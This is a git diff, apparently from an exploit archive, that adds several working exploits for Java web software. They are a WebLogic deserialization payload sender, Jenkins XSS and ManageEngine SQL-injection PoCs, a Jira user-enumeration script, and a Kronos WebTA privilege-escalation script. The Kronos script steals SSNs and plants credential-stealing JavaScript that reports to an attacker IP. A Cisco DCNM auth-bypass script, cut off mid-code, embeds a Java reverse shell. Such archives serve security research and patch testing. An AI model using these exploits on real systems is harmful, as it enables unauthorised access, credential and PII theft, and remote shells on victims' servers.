T48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM5NTMiPjxieXRlPjgxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM5OSI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzU1NSI+PGJ5dGU+Njc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI5ODEiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ5MjIiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NzQiPjxieXRlPjc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2Mjc2Ij48Ynl0ZT4yMDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYwOTIiPjxieXRlPjEwMDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI0NTYiPjxieXRlPjExOTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NTMiPjxieXRlPjgyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDk3NSI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY2OCI+PGJ5dGU+MTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyNjEiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTEiPjxieXRlPjExNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjgxOCI+PGJ5dGU+MTExPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTE3NiI+PGJ5dGU+NTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzODQ3Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5NiI+PGJ5dGU+OTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzOTMxIj48Ynl0ZT43MTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2NzciPjxieXRlPjExNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ4MzYiPjxieXRlPjk4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzc3NyI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMTMzIj48Ynl0ZT4xMDY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODAwIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI2MjciPjxieXRlPjEyMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3NjIiPjxieXRlPjg1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzUzIj48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMDMzIj48Ynl0ZT4xMTg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjY4Ij48Ynl0ZT44NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5NCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjczNSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxOTkyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxOTg2Ij48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NiI+PGJ5dGU+NDc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NDI5Ij48Ynl0ZT4xPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTE1MCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MDg0Ij48Ynl0ZT45OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU4MjIiPjxieXRlPjg5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjA4Ij48Ynl0ZT45ODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE1MjMiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQwOTQiPjxieXRlPjc2PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjU5NyI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NDY3Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NTExIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODQ3Ij48Ynl0ZT4xODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NDEiPjxieXRlPjExNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijg0NyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjEzOCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iOTMzIj48Ynl0ZT4xMTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNDYyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEwODUiPjxieXRlPjExNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwNDQiPjxieXRlPjExNzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ5MTgiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTk2NCI+PGJ5dGU+MTAzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzM4Ij48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijg2MSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTIwNSI+PGJ5dGU+Njg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NTUxIj48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNzQ3Ij48Ynl0ZT43NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUxNDkiPjxieXRlPjExNzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzMjEiPjxieXRlPjEwODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI3NTciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzg2NiI+PGJ5dGU+Nzk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjUyIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNzMiPjxieXRlPjQ5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc3MyI+PGJ5dGU+MTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIyOTMiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0NTUiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU2NTciPjxieXRlPjE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MDQ1Ij48Ynl0ZT4xPC9ieXRlPjwvdm9pZD48L2FycmF5Pjwvdm9pZD48L2FycmF5PjwvamF2YT48L3dvcms6V29ya0NvbnRleHQ+PC9zb2FwZW52OkhlYWRlcj48c29hcGVudjpCb2R5Lz48L3NvYXBlbnY6RW52ZWxvcGU+Cg=="
+data = base64.b64decode(yss_payload)
+data_payload = data_pref + data.decode()
+if usessl:
+	attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
+else:
+	attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
+res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)
+
+if cobaltstrike and not metasploit:
+	cmd_exec = "Cobalt Strike"
+elif not cobaltstrike and metasploit:
+	cmd_exec = "Metasploit"
+print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)
+print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)
+
+if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):
+	os.remove("/tmp/CVE_2019_2729_MSF.txt")
+elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):
+	os.remove("/tmp/CVE_2019_2729_CS.txt")
\ No newline at end of file
diff --git a/exploits/java/webapps/47927.txt b/exploits/java/webapps/47927.txt
new file mode 100644
index 000000000..5430836dd
--- /dev/null
+++ b/exploits/java/webapps/47927.txt
@@ -0,0 +1,9 @@
+# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
+# Exploit Author: Ai Ho
+# Vendor Homepage : https://jenkins.io/
+# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
+# References: https://jenkins.io/security/advisory/2020-01-15/
+# CVE: CVE-2020-2096
+
+# PoC:
+http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E
\ No newline at end of file
diff --git a/exploits/java/webapps/47949.txt b/exploits/java/webapps/47949.txt
new file mode 100644
index 000000000..8d970537f
--- /dev/null
+++ b/exploits/java/webapps/47949.txt
@@ -0,0 +1,27 @@
+# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
+# discovery Date: 2019-01-24
+# published : 2020-01-20
+# Exploit Author: AmirHadi Yazdani
+# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
+# Software Link: https://www.manageengine.com/network-configuration-manager/
+# Demo: http://demo.networkconfigurationmanager.com
+# Version: <= Build Version  : 12.2
+# Tested on: win 2012 R2
+------------
+About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) :     
+                                
+Network Configuration Manager is a multi vendor network change,
+configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
+NCM helps automate and take total control of the entire life cycle of device configuration management.
+--------------------------------------------------------
+
+Exploit POC :
+
+# Parameter: apiKey (GET)
+# Title: PostgreSQL Time Based Blind
+# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+#Payload:  
+http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930
+
+--------------------------
\ No newline at end of file
diff --git a/exploits/java/webapps/47972.txt b/exploits/java/webapps/47972.txt
new file mode 100644
index 000000000..1b7190f49
--- /dev/null
+++ b/exploits/java/webapps/47972.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Liferay CE Portal 6.0.2 - Remote Command Execution
+# Google Dork: N/A
+# Date: 2020-01-29
+# Exploit Author: Berk Dusunur
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://sourceforge.net/projects/lportal/files/Liferay%20Portal/6.0.2/
+# https://github.com/chakadev/Liferay-CE-Portal-Java-Deserialization
+# Version: 6.0.2
+# Tested on: MacOS
+# CVE : N/A
+
+#PoC
+
+I already shared payloads in my github repo (Because payloads so small and
+have a meta character). You must find the right syntax by brute-force
+method.Payloads I share are for time-based proof of concept (sleep 10). The
+application may not always output the command. That's why you should try
+time-based payload while doing PoC.
+
+
+
+POST /api/liferay HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+PAYLOADS HERE
\ No newline at end of file
diff --git a/exploits/java/webapps/47990.py b/exploits/java/webapps/47990.py
new file mode 100755
index 000000000..5c4ecc06c
--- /dev/null
+++ b/exploits/java/webapps/47990.py
@@ -0,0 +1,88 @@
+# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
+# Date: 2019-09-11
+# Exploit Author: Mufeed VH
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira
+# Version: 8.3.4
+# Tested on: Pop!_OS 19.10
+# CVE : CVE-2019-8449
+
+# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
+# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
+# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796
+
+#!/usr/bin/env python
+
+
+__author__  = "Mufeed VH (@mufeedvh)"
+
+import os
+import requests
+
+
+class CVE_2019_8449:
+    def ask_for_domain(self):
+        domain = raw_input("[>] Enter the domain of Jira instance: => ")
+        if domain == "":
+            print("\n[-] ERROR: domain is required\n")
+            self.ask_for_domain()
+        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)
+
+    def ask_for_query(self):
+        self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
+        if self.query == "":
+            print("\n[-] ERROR: The query parameter is required\n")
+            self.ask_for_query()    
+
+    def exploit(self):
+        self.ask_for_domain()
+        self.ask_for_query()
+
+        maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
+        showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
+        fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
+        projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
+        issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
+        avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
+        caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
+        excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")    
+
+        params = {
+            'query': self.query, 
+            'maxResults': maxResults, 
+            'showAvatar': showAvatar, 
+            'fieldId': fieldId, 
+            'projectId': projectId, 
+            'issueTypeId': issueTypeId, 
+            'avatarSize': avatarSize, 
+            'caseInsensitive': caseInsensitive, 
+            'excludeConnectAddons': excludeConnectAddons
+        }
+
+        send_it = requests.get(url = self.url, params = params)
+
+        try:
+            response = send_it.json()
+        except:
+            print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
+            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
+            print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
+            quit()
+        
+        print("\n<========== RESPONSE ==========>\n")
+        print(response)
+        print("\n<==============================>\n")
+
+if __name__ == '__main__':
+    os.system('cls' if os.name == 'nt' else 'clear')
+    
+    print('''
+        ================================================
+        |                                              |
+        | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
+        |  Proof of Concept By: Mufeed VH [@mufeedvh]  |
+        |                                              |
+        ================================================
+    ''')
+
+    CVE_2019_8449().exploit()
\ No newline at end of file
diff --git a/exploits/java/webapps/48001.py b/exploits/java/webapps/48001.py
new file mode 100755
index 000000000..37e18c04c
--- /dev/null
+++ b/exploits/java/webapps/48001.py
@@ -0,0 +1,293 @@
+#  Exploit Title: Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation
+#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
+#  Exploit Author: Nolan B. Kennedy (nxkennedy)
+#  Discovery date: 2019-09-20
+#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
+#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
+#  Tested on: Linux
+#  CVE: (Remote Privesc) CVE-2020-8495 | (Stored XSS) CVE-2020-8493
+#  Usage: python3 exploit.py http://target
+
+#!/bin/bash/python3
+
+###
+# *Exploit requires credentials with Timekeeper or Supervisor privileges
+#
+# Exploit abuses delegation privs present in the WebTA "/servlet/com.threeis.webta.H491delegate"
+# servlet. By specifying the "delegate" and "delegatorUserId" parameter an attacker can use an
+# admin user id to delegate role 5 (aka admin privs) to any other known user id, including oneself.
+#
+# selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN>
+#
+# With our new admin account, we can abuse a stored XSS vulnerability present in the login page,
+# banner (displayed on every page) & password reset page. We can also pull system information and
+# download a file containing the FULL NAME AND SSN OF EVERY USER in the database (typically thousands).
+#
+#
+# Below is an example of the exploit output:
+#####
+# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper
+#
+# [+] Available Admin Accounts:
+# MOTOKO
+# BATOU
+# TOGUSA
+# ISHIKAWA
+#
+# [-] Attempting to use account 'MOTOKO' to delegate Admin privs to 'TESTER'...
+#
+# [+] 'TESTER' successfully elevated to Admin privs :)
+#
+#
+# [+] Logged in as 'TESTER' with roles: Employee, Timekeeper, Admin
+#
+# [+] Webta Version Information
+# Site parameter: company
+# Licensed modules:WEBTA-LEAVE, WEBTA, WEBTA
+# webTA Servlet Version: 3.8.6.79029
+# webTA Database Version: 3.8.6.79029
+# App Server OS: Linux version 3.10.0-1062.1.1.el7.x86_64 (amd64)
+# App Server JDK Version: Oracle Corporation version 1.8.0_222
+# App Server Servlet Engine: Apache Tomcat/7.0.76 (Servlet API 3.0)
+# App Server JDBC Driver: Oracle JDBC driver version 11.2.0.4.0
+# Database Version:  Oracle JDBC driver version 11.2.0.4.0
+# Database Connection: jdbc:oracle:thin:@//foo.rds.amazonaws.com:1521/webtadb<br>connected as user WEBTASVC
+#
+# [-] Downloading names and SSNs...
+#
+# [+] Complete. 5020 users written to file 'WebTA-PII.xls'
+# [+] Sample Content:
+# USERID,Last Name,First Name,Middle Name,SSN,Supervisor ID,Timekeeper ID,Organization,Pay Period,Active Status,
+# MOTOKO,Kusanagi,Major,M.,987-65-4321,ARAMAKI,ARAMAKI,SECTION9,19,Active,
+#
+# [+] Stored XSS attack complete :)
+#####
+
+import re
+from requests import Request, Session
+from sys import argv, exit
+
+
+
+
+banner = """###
+#  Kronos WebTA 3.8.x - 4.0 Authenticated Remote Privilege Escalation & Stored XSS Exploit
+#  Discovered by: Elwood Buck & Nolan B. Kennedy of Mindpoint Group
+#  Exploit Author: Nolan B. Kennedy (nxkennedy)
+#  Discovery date: 20 SEPT 2019
+#  Vendor Homepage: https://www.kronos.com/products/kronos-webta
+#  Version: 3.8.x - 4.0 affected. (Exploit tested on v3.8.6.79029)
+#  Tested on: Linux
+#  CVE: (Remote Privesc) CVE-2020-8494 | (Stored XSS) CVE-2020-8493
+#  Usage: python3 exploit.py http://target
+###"""
+base_url = argv[1]
+username = "TESTER"
+password = "password!1234"
+# set to True if you want to also exploit Stored XSS
+xss = False
+# xss strings can be injected into 3 different 'banner' locations (feel free to modify content)
+# WILL NOT ERASE CONTENT ALREADY IN APPLICATION
+xss_login_page = """
+<script>
+/* steals login creds each time a user logs in and forwards them to attacker ip */
+
+var attacker = "192.168.1.3";
+
+/* don't forget to set up a listener (python3 -m http.server 80) */
+function stealCreds() {
+        var username = document.frm[1].value;
+        var password = document.frm[2].value;
+        img = new Image();
+        img.src = "http://"+attacker+"/?"+ "username=" +username+ "&" + "password=" +escape(password);
+        setTimeout('document.frm.submit();', 1000);
+        return false;
+        }
+
+function readyToSteal() {
+	document.frm.onsubmit = stealCreds;
+	}
+
+/* special for WebTA because otherwise the script loads before the DOM and password form */
+document.addEventListener("DOMContentLoaded", readyToSteal);
+</script>
+"""
+xss_banner_everypage = ""
+xss_passwordchange_page = ""
+s = Session()
+adm_list = []
+
+
+
+def web_req(url, data):
+	print()
+	req = Request('POST', url, data=data)
+	prepared = s.prepare_request(req)
+	resp = s.send(prepared, allow_redirects=True, verify=False)
+	return resp
+
+
+
+def killActiveSession():
+	url = base_url + "/servlet/com.threeis.webta.H111multipleLogin"
+	data = {"selFunc":"continue"}
+	resp = web_req(url, data)
+
+
+
+def checkPrivs():
+	url = base_url + "/servlet/com.threeis.webta.HGateway"
+	data = {}
+	resp = web_req(url, data)
+	html = resp.text
+	activeSession = roles = re.findall(r'(.*?)You have an active session open at a another browser(.*?)\.', html)
+	roles = re.findall(r'(.*?)type\="button"(.*?)>', html)
+	if activeSession:
+		print("[-] Killing active session...")
+		killActiveSession()
+		login()
+	elif roles:
+		roles_list = []
+		for role in roles:
+			role = role[1].split('"')[1]
+			roles_list.append(role)
+		print("[+] Logged in as '{}' with roles: {}".format(username, ', '.join(roles_list)))
+
+	else:
+		print("[!] Account does not have required Timekeeper or Supervisor privs")
+		exit()
+
+
+
+def login():
+	url = base_url + "/servlet/com.threeis.webta.H110login"
+	data = {"j_username": username, "j_password": password, "login": "++Log+In++"}
+	resp = web_req(url, data)
+	if resp.status_code != 200:
+		print("[!] Failed login in as '{}'".format(username))
+		exit()
+	checkPrivs()
+
+
+
+def findAdmins():
+	url = base_url + "/servlet/com.threeis.webta.H940searchUser"
+	data = {
+        "selFunc":"search",
+        "return_page":"com.threeis.webta.P491delegate",
+        "return_variable":"delegate",
+        "search_org":"0",
+        "search_role":"Administrator",
+        "actingRole":"2",
+        "payload_name_0":"selFunc",
+        "payload_val_0":"search",
+        "payload_name_1":"selRow",
+        "payload_name_2":"delegate",
+        "payload_name_3":"delegateRole",
+        "payload_val_3":"2",
+        "payload_name_4":"delegatorEmpId",
+        "payload_val_4":"15667", # might need a valid user id
+        "payload_name_5":"delegatorUserId",
+        "payload_val_5":username,
+        }
+	resp = web_req(url, data)
+	html = resp.text
+	adm_usrs = re.findall(r'<TD CLASS\="bckGray">(.*?)\n', html)
+	print("[+] Available Admin Accounts:")
+	for snip in adm_usrs:
+        	adm = snip.split('</TD><TD CLASS="bckGray">')[2]
+        	adm_list.append(adm)
+        	print(adm)
+
+
+
+def privesc():
+	url = base_url + "/servlet/com.threeis.webta.H491delegate"
+	data = {
+	"selFunc":"add",
+	"delegate":username,
+	"delegateRole":"5",
+	"delegatorEmpId":"1234",
+	"delegatorUserId":adm_list[0],
+	}
+	print()
+	print("[-] Attempting to use account '{}' to delegate Admin privs to '{}'...".format(adm_list[0], username))
+	resp = web_req(url, data)
+	print("[+] '{}' successfully elevated to Admin privs :)".format(username))
+
+
+
+def storeXSS():
+	url = base_url + "/servlet/com.threeis.webta.H261configMenu"
+	data = {'selFunc':'messages'}
+	### to be covert we want to append our js to the end of * messages/banners already there *
+	resp = web_req(url, data)
+	html = resp.text
+	messages = re.findall(r'<TEXTAREA name\=(.*?)</textarea>', html, re.DOTALL)
+	messages_clean = []
+	for message in messages:
+		message = message.split('wrap="virtual">')[1]
+		messages_clean.append(message)
+	login_page = messages_clean[0]
+	banner_everypage = messages_clean[1]
+	passwordchange_page = messages_clean[2]
+
+	###  now we inject our javascript
+	url = base_url + "/servlet/com.threeis.webta.H201config"
+	data = {
+		"selFunc":"save",
+		"loginMessage": login_page + xss_login_page,
+		"bannerMessage": banner_everypage + xss_banner_everypage,
+		"passwordMessage": passwordchange_page + xss_passwordchange_page,
+	}
+	resp = web_req(url, data)
+	print("[+] Stored XSS attack complete :)")
+
+
+
+def stealPII():
+	url = base_url + "/servlet/com.threeis.webta.H287userRoleReport"
+	data = {
+	"selFunc":"downloademp",
+	"roletype":"1",
+	"orgsel":"0",
+	"pageNum":"1",
+	}
+	print("[-] Downloading names and SSNs...")
+	resp = web_req(url, data)
+	filename = "WebTA-PII.xls"
+	with open(filename, 'wb') as f:
+		f.write(resp.content)
+	with open(filename) as f:
+		for i, l in enumerate(f):
+			pass
+	count = i # does not include header
+	print("[+] Complete. {} users written to file '{}'".format(count, filename))
+	print("[+] Sample Content:")
+	with open(filename) as f:
+		for n in range(2):
+			print(",".join(f.readline().split("\t")), end="")
+
+
+
+def dumpSysInfo():
+	url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin"
+	data = {"selFunc":"about"}
+	resp = web_req(url, data)
+	html = resp.text
+	data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL)
+	print("[+] " + data[0])
+
+
+
+if __name__ == '__main__':
+	print(banner)
+	login()
+	findAdmins()
+	privesc()
+	login() # login again because we need the refreshed perms after privesc
+	dumpSysInfo()
+	#stealPII()
+	if xss:
+		storeXSS()
+	s.close()
\ No newline at end of file
diff --git a/exploits/java/webapps/48018.py b/exploits/java/webapps/48018.py
new file mode 100755
index 000000000..6da6093f6
--- /dev/null
+++ b/exploits/java/webapps/48018.py
@@ -0,0 +1,265 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
+
+Bug 1: CVE-2019-15975 / ZDI-20-003
+Bug 2: CVE-2019-15979 / ZDI-20-100
+
+Notes:
+======
+
+Si.java needs to be compiled against Java 8 (the target used 1.8u201):
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Si {
+    static{
+        try {
+            String host = "192.168.100.159";
+            int port = 1337;
+            String cmd = "cmd.exe";
+            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+            Socket s = new Socket(host,port);
+            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+            while(!s.isClosed()){
+                while(pi.available()>0){
+                    so.write(pi.read());
+                }
+                while(pe.available()>0){
+                    so.write(pe.read());
+                }
+                while(si.available()>0){
+                    po.write(si.read());
+                }
+                so.flush();
+                po.flush();
+                Thread.sleep(50);
+                try {
+                    p.exitValue();
+                    break;
+                }catch (Exception e){}
+            }
+            p.destroy();
+            s.close();
+        }catch (IOException | InterruptedException e){ }
+    }
+}
+
+Example:
+========
+
+1. Modify the above Si.java to contain your connectback ip and port
+2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
+3. Launch the poc.py against your target using the share
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback:port> <smbserver> <smbpath>
+(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
+(+) attempting auth bypass 1
+(+) bypassed auth! added a global admin hacker:Hacked123
+(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+"""
+
+import re
+import os
+import sys
+import time
+import base64
+import socket
+import requests
+import calendar
+import telnetlib
+from uuid import uuid4
+from threading import Thread
+from Crypto.Cipher import AES
+from xml.etree import ElementTree
+from datetime import datetime, timedelta
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+class AESCipher:
+    def __init__(self):
+
+        # Cisco's hardcoded key
+        self.key = "s91zEQmb305F!90a"
+        self.bs = 16
+
+    def _pad(self, s):
+        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
+
+    def encrypt(self, raw):
+        raw = self._pad(raw)
+        iv = "\x00" * 0x10
+        cipher = AES.new(self.key, AES.MODE_CBC, iv)
+        return base64.b64encode(cipher.encrypt(raw))
+
+def make_raw_token(target):
+    """ craft our token """
+    key = "Source Incite"
+    uuid = str(uuid4()).replace("-","")[0:20]
+    time = leak_time(target)
+    return "%s-%s-%s" % (key, uuid, time)
+
+def bypass_auth(target, token, usr, pwd):
+    """ we use this primitive to fully bypass auth """
+    global user_added_already
+    d = {
+        "userName" : usr,
+        "password" : pwd,
+        "roleName" : "global-admin"
+    }
+    h = { "afw-token" : token }
+    uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
+    r = requests.post(uri, data=d, headers=h, verify=False)
+    try:
+        json = r.json()
+    except ValueError:
+        return False
+    if json["resultMessage"] == "Success":
+        user_added_already = False
+        return True
+    elif json["resultMessage"] == "User already exists.":
+        user_added_already = True
+        return True
+    return False
+
+def leak_time(target):
+    """ leak the time from the server (not really needed) """
+    uri = "https://%s/" % target
+    r = requests.get(uri, verify=False)
+    r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
+    return calendar.timegm(r_time.timetuple())
+
+def gen_token(target, usr, pwd):
+    """ this authenticates via the SOAP endpoint """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.jaxws.dcbu.cisco.com/">'
+    soap_body += '\t<soapenv:Header/>'
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:requestToken>'
+    soap_body += '\t\t\t<username>%s</username>' % usr
+    soap_body += '\t\t\t<password>%s</password>' % pwd
+    soap_body += '\t\t\t<expiration>100000</expiration>'
+    soap_body += '\t\t</ep:requestToken>'
+    soap_body += '\t</soapenv:Body>'
